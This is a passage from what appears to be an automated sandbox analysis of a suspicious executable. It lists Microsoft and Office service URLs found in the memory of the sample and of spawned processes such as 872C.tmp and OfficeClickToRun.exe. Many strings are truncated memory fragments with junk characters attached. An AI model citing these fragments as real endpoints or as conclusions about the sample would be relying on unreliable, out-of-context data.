872C.tmp, 00000003.00000003.1392840202.000000000560D000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431809017.000000000561D000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392103556.00000000056FA000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392770568.0000000005603000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1389651071.0000000003E8C000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393510255.000000000561D000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1950235004.00000248C3189000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2015854306.00000248C318B000.00000004.00000020.00020000.00000000.sdmp, 
OfficeClickToRun.exe, 00000006.00000003.1664801487.00000248C318A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.entity.
    Source: 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394113903.00000000055A3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1395207483.00000000055A3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.0000000005595000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.entity.osi.office.net/OfficeEntity/web/views/juno.desktop.cshtmltml
    Source: 872C.tmp, 00000003.00000003.1430514920.0000000005603000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1430912671.0000000005617000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393016019.0000000005617000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392840202.000000000560D000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431809017.000000000561D000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392770568.0000000005603000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393510255.000000000561D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.entity.osi.office.net/OfficeEntity/web/views/juno.mac.cshtmltmlloqs
    Source: 872C.tmp, 00000003.00000003.1394136326.00000000055F3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393845975.00000000055B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.hubblecontent.osi.office.net/gs
    Source: 872C.tmp, 00000003.00000003.1394136326.00000000055F3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393845975.00000000055B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.hubblecontent.osi.office.net/llMe6&
    Source: 872C.tmp, 00000003.00000003.1394136326.00000000055F3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393845975.00000000055B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.hubblecontent.osi.office.net/log-1
    Source: 872C.tmp, 00000003.00000003.1394136326.00000000055F3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393845975.00000000055B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.hubblecontent.osi.office.net/tlook
    Source: 872C.tmp, 00000003.00000003.1394987937.0000000003F8B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1430249735.0000000003F8B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394240204.0000000003F7C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.int.designerapp.osi.office.net/fontsrapp
    Source: 872C.tmp, 00000003.00000003.1394136326.00000000055F3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393845975.00000000055B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://client-office365-tas.msedge.net/abPaneK
OfficeClickToRun.exe, 00000006.00000003.1949642856.00000248C2BFF000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2053127939.00000248C31E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dataservice.o365filtering.com
    Source: 872C.tmp, 00000003.00000003.1393977781.0000000005561000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1664801487.00000248C30EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFileBearer
    Source: 872C.tmp, 00000003.00000003.1430514920.0000000005603000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1430912671.0000000005617000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393016019.0000000005617000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392840202.000000000560D000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431809017.000000000561D000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392770568.0000000005603000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393510255.000000000561D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFileFileil
    Source: 872C.tmp, 00000003.00000003.1430514920.0000000005603000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1430912671.0000000005617000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393016019.0000000005617000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392840202.000000000560D000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431809017.000000000561D000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392770568.0000000005603000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393510255.000000000561D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFileides
    Source: 872C.tmp, 00000003.00000003.1393977781.0000000005561000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1664801487.00000248C30EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFileBearer
    Source: 872C.tmp, 00000003.00000003.1430514920.0000000005603000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1430912671.0000000005617000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393016019.0000000005617000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392840202.000000000560D000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431809017.000000000561D000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392770568.0000000005603000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393510255.000000000561D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFileg
    Source: 872C.tmp, 00000003.00000003.1430514920.0000000005603000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1430912671.0000000005617000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393016019.0000000005617000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392840202.000000000560D000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431809017.000000000561D000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392770568.0000000005603000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393510255.000000000561D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFilerer
    Source: 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005525000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394113903.00000000055A3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1395207483.00000000055A3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.0000000005595000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1390200613.0000000003E59000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392103556.00000000056FA000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2052379122.00000248C2CF4000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2052051790.00000248C2CEB000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000002.2059567438.00000248C2CFD000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1949642856.00000248C2BFF000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1664801487.00000248C30EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
    Source: 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394113903.00000000055A3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1395207483.00000000055A3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.0000000005595000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPoliciesN
    Source: 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394113903.00000000055A3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1395207483.00000000055A3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.0000000005595000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPoliciesg
    Source: 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394113903.00000000055A3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1395207483.00000000055A3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.0000000005595000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPoliciesx
    Source: 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394113903.00000000055A3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1395207483.00000000055A3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.0000000005595000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://designerapp.officeapps.live.com/designerapp4A-41F5A7235243
    Source: 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005525000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393823050.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392280337.0000000003CCF000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392103556.00000000056FA000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1429912339.0000000005553000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1665092686.00000248C2B0D000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2016612588.00000248C2D7B000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1949642856.00000248C2D61000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1707272287.00000248C2D61000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1694509817.00000248C2D61000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000002.2059927373.00000248C2D7D000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2013229601.00000248C2D61000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1664801487.00000248C30EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://designerappservice.officeapps.live.com
    Source: 872C.tmp, 00000003.00000003.1393977781.0000000005561000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1664801487.00000248C30EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.cortana.aiBearer
    Source: 872C.tmp, 00000003.00000003.1393977781.0000000005561000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1664801487.00000248C30EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.cortana.aihttps://login.windows.net/common/oauth2/authorize
    Source: 872C.tmp, 00000003.00000003.1392584595.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393114083.0000000005589000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1429912339.0000000005553000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint//rest
    Source: 872C.tmp, 00000003.00000003.1392584595.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393114083.0000000005589000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1429912339.0000000005553000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/testBR
    Source: 872C.tmp, 00000003.00000003.1390200613.0000000003E46000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005525000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1389167488.0000000003E63000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005636000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1430359257.0000000005666000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1390200613.0000000003E59000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392259764.00000000056A2000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392103556.00000000056FA000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1389651071.0000000003E8C000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1950235004.00000248C3189000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1664801487.00000248C318A000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1678127398.00000248C317E000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2014742266.00000248C3179000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2053127939.00000248C31E1000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2015894412.00000248C31DA000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2013432377.00000248C3169000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1664801487.00000248C30EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev0-api.acompli.net/autodetect
    Source: 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005525000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1389167488.0000000003E63000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1388403613.0000000003E5A000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393114083.0000000005589000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1390200613.0000000003E59000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392103556.00000000056FA000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1388436799.0000000003D1A000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1389651071.0000000003E8C000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1429912339.0000000005553000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2054015992.00000248C2D59000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1694509817.00000248C2D3F000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1707272287.00000248C2D28000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1950463823.00000248C2D26000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1664801487.00000248C30EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://directory.services.
    Source: 872C.tmp, 00000003.00000003.1392584595.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393114083.0000000005589000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1429912339.0000000005553000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://directory.services.live.com/profile/Profile.asmx.asmxCQ
    Source: sBvrNv0wtb.exe, 00000000.00000003.1313913322.000001972756D000.00000004.00000020.00020000.00000000.sdmp, sBvrNv0wtb.exe, 00000000.00000003.1347329405.000001972797A000.00000004.00000020.00020000.00000000.sdmp, 918D.tmp, 00000004.00000000.1346823200.00007FF7A9234000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://docs.rs/getrandom#nodejs-es-module-support
    Source: 872C.tmp, 00000003.00000003.1389030539.0000000003CF3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1388768349.0000000003CD9000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1388768349.0000000003CAB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ecs.nel.measure.office.net/api/report?TenantId=Office&DestinationEndpoint=Edge-Prod-EWR30r4c
    Source: 872C.tmp, 00000003.00000003.1394136326.00000000055F3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393845975.00000000055B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ecs.office.com/config/v1/DesignerPM6g5
    Source: 872C.tmp, 00000003.00000003.1394136326.00000000055F3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393845975.00000000055B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ecs.office.com/config/v1/Designertionag
    Source: 872C.tmp, 00000003.00000003.1388768349.0000000003CD9000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1389143678.0000000003CDB000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394889765.0000000001DEF000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1388768349.0000000003CAB000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1432006478.0000000001DEF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ecs.office.com/config/v2/Office/officeclicktorun/16.0.18526.20168/Production/CC?&EcsCanary=1
    Source: sBvrNv0wtb.exe, 00000000.00000003.1320415962.0000019728184000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000002.00000000.1320044762.000000000142B000.00000002.00000001.01000000.00000005.sdmp, 872C.tmp, 00000003.00000000.1321361371.000000000142B000.00000002.00000001.01000000.00000005.sdmpString found in binary or memory: https://ecs.office.com/config/v2/OfficeetagPerpetualLicenseLicenseCategoryArchitectureSubscriptionLi
    Source: 872C.tmp, 00000003.00000003.1388768349.0000000003CD9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ecs.office.com:443/config/v2/Office/officeclicktorun/16.0.18526.20168/Production/CC?&EcsCana
    Source: 872C.tmp, 00000003.00000003.1390200613.0000000003E46000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005525000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1389167488.0000000003E63000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1388403613.0000000003E5A000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1388611638.0000000003E46000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1390200613.0000000003E59000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1429775033.000000000576E000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392103556.00000000056FA000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392714396.0000000005725000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1389651071.0000000003E8C000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2013075406.00000248C2C06000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2055774494.00000248C2C5F000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000002.2059122796.00000248C2C5F000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2047270961.00000248C2C5B000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1949642856.00000248C2BFF000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2015326352.00000248C2C4C000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1664801487.00000248C30EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://enrichment.osi.office.net/
    Source: 872C.tmp, 00000003.00000003.1390200613.0000000003E46000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392584595.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005525000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1389167488.0000000003E63000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1388403613.0000000003E5A000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393114083.0000000005589000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1388611638.0000000003E46000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1390200613.0000000003E59000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392103556.00000000056FA000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1389651071.0000000003E8C000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1429912339.0000000005553000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 